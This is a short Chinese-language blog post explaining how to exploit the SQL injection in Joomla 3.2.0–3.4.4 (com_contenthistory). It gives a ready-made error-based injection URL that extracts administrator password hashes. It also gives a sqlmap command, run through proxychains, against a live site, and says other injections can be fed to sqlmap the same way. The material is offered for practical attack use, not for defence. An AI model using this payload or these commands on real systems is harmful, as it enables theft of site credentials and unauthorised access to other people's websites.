make life get better

sqlmap利用 Joomla 3.2.0 – 3.4.4 注入漏洞的方法

sqlmap利用 Joomla 3.2.0 – 3.4.4 注入漏洞的方法

最近出了一个 Joomla的注入 影响大批网站

随后有人在sebug上给出了exp

 

漏洞详细说明与利用方法:https://www.trustwave.com/Resources/SpiderLabs-Blog/Joomla-SQL-Injection-Vulnerability-Exploit-Results-in-Full-Administrative-Access/

存在SQL注入的地方位于:/administrator /components /com_contenthistory/ models/history.php

 

直接获取密码的exp

 

http://10.211.55.3/joomla/index.php?option=com_contenthistory&amp;view=history&amp;list[ordering]=&amp;item_id=1&amp;type_id=1&amp;list[<span class="hljs-operator"><span class="hljs-keyword">select</span>]=(<span class="hljs-keyword">select</span> <span class="hljs-number">1</span> <span class="hljs-keyword">from</span> (<span class="hljs-keyword">select</span> <span class="hljs-keyword">count</span>(*),<span class="hljs-keyword">concat</span>((<span class="hljs-keyword">select</span> (<span class="hljs-keyword">select</span> <span class="hljs-keyword">concat</span>(<span class="hljs-keyword">password</span>)) <span class="hljs-keyword">from</span> %<span class="hljs-number">23</span>__users <span class="hljs-keyword">limit</span> <span class="hljs-number">0</span>,<span class="hljs-number">1</span>),<span class="hljs-keyword">floor</span>(<span class="hljs-keyword">rand</span>(<span class="hljs-number">0</span>)*<span class="hljs-number">2</span>))x <span class="hljs-keyword">from</span> information_schema.<span class="hljs-keyword">tables</span> <span class="hljs-keyword">group</span> <span class="hljs-keyword">by</span> x)a)</span>

其中%23_即为joomla表前缀,无需获取表前缀,joomla会自动将#_转换为表前缀。

 

详细请看http://www.sebug.net/vuldb/ssvid-89680

 

—————————————————————————邪恶的分割线————————————————————————

然后实战中有各种不方便的地方 

其实构造一下就可以用sqlmap跑了。。。

proxychains sqlmap -u “http://7kb.org/index.php?option=com_contenthistory&view=history&list[ordering]=&item_id=2&type_id=1&list[select]=(*” -v 3 –tech=E

 

同理 很多注入都可以直接构造 丢给sqlmap 比如前段时间出的discuz 7.2注入 没必要写那种脱裤工具

 

7kb.org 原创,转载来自 www.7kb.org


评论